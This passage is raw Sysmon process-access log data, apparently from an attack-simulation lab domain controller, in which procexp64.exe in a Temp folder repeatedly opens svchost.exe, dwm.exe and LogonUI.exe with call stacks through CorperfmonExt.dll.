15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 